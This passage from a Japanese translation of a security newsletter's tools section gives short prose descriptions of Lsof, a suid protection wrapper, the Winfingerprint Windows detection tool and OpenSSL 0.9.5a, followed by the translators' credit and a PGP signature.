UNIX/Alpha, FreeBSD, HP-UX, IRIX, Linux, NetBSD, OpenBSD, SCO, Solaris, SunOS and Ultrix) 著者: Vic Abell (abe@purdue.edu) 関連するURL: http://www.securityfocus.com/tools/1008 Lsof は UNIX 用の解析ツールです。この名の由来は LiSt Open Files で、その名の通りの動作をします。現在システム上で動作しており、プロセスによって開かれているファイルについて、情報を列挙します。今回、NetBSD Alpha サポートが追加され、Solaris Kernel アドレスフィルタリングが追加されました。/dev/kmem を利用する Linux, Solaris, BSDI, FreeBSD, NeXTSTEP, OpenBSD, OpenStep についての処理が修正されました。64 bit ファイル長とオフセットが BSDI, FreeBSD, NetBSD, OpenBSD 向けにサポートされました。Solaris 9 (SunOS 2.9) と Linux 2.4 のサポートが追加され、バグが修正されました。 4. Wrapper v2 (Linux, Solaris and UNIX) 作者: Joe Zbiciak (im14u2c@primenet.com) 関連する URL: http://cegt201.bradley.edu/~im14u2c/wrapper/ このラッパープログラムは、コマンドライン引数、あるいは不適切に特定の環境変数を信頼してしまうためにバッファオーバーフローを起こす可能性がある suid/sgid プログラムを保護するために開発されました。このラッパーは競合状態 (race-conditions) は修正しません。また、他のバグや問題についての手助けも行いません。 5. Winfingerprint 2.2.8 (Netware, Windows 95/98 and Windows NT) 作者: Kirby Kuehl (vacuum@technotronic.com) 関連するURL: http://www.technotronic.com/winfingerprint/ これは、最先端のリモートにある Windows OS を検知するツールです。最新機能: SMB クエリから PDC(プライマリドメインコントローラ)、 BDC(バックアップドメインコントローラ) NT メンバーサーバ、 NTワークステーション、SQLサーバ、NOVELL Netwareサーバ、 Windows For Workgroups、Windows 9x、Administrative ($)を含むユーザ管理サーバ、情報共有サーバ、グローバルグループグループ・ユーザ管理サーバ、稼働中のサービスの表示、ネットワークコンピュータ上のホストへスキャン、 NULL IPC$ セッションの確立、レジストリクエリー(現時点では、適用されたサービスパックと Hotfilx まで分かります)を転送、取得日・時間によって判断することができます。変更点: 一覧作成、共有、グループ、ユーザ、サービス一覧、トランスポート、時間、OS バージョンの判定、サービスパックおよび hotfix の適用状態、 HTML 出力が変更されています。 6. OpenSSL 0.9.5a (UNIX and Windows NT) 作者: OpenSSL Project 関連するURL: http://www.openssl.org/ OpenSSL プロジェクトは頑丈で、商業品質で、すべての機能を含み、オープンソース形態のツールキットを Secure Sockets Layer (SSL v2/v3) 、 Transport Layer Security (TLS v1) プロトコルの実装として、成果物を全世界レベルで利用可能な暗号強度で開発しました。このプロジェクトは、このソフトウェアについての関連するやり取り、計画、開発、関連文書の作成にインターネットを利用している世界中のボランティアによって運営されています。 OpenSSL は洗練された SSLeay ライブラリを元にしており、Apache 形式のライセンスに基づいています。 - -- Translated by SAKAI Yoriyuki, KAGEYAMA Tetsuya Little eArth Corporation - LAC Co., Ltd. http://www.lac.co.jp/security/ -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Edition 5.5.5J Comment: SAKAI Yoriyuki iQA/AwUBOcvgjJQwtHQKfXtrEQIJbQCfQaLnzfcRRQ7VPLotTeIkhKJBHvQAnjKU CAsIA6YQA5KclpRNaV5dIPP3 =j3DQ -----END PGP SIGNATURE-----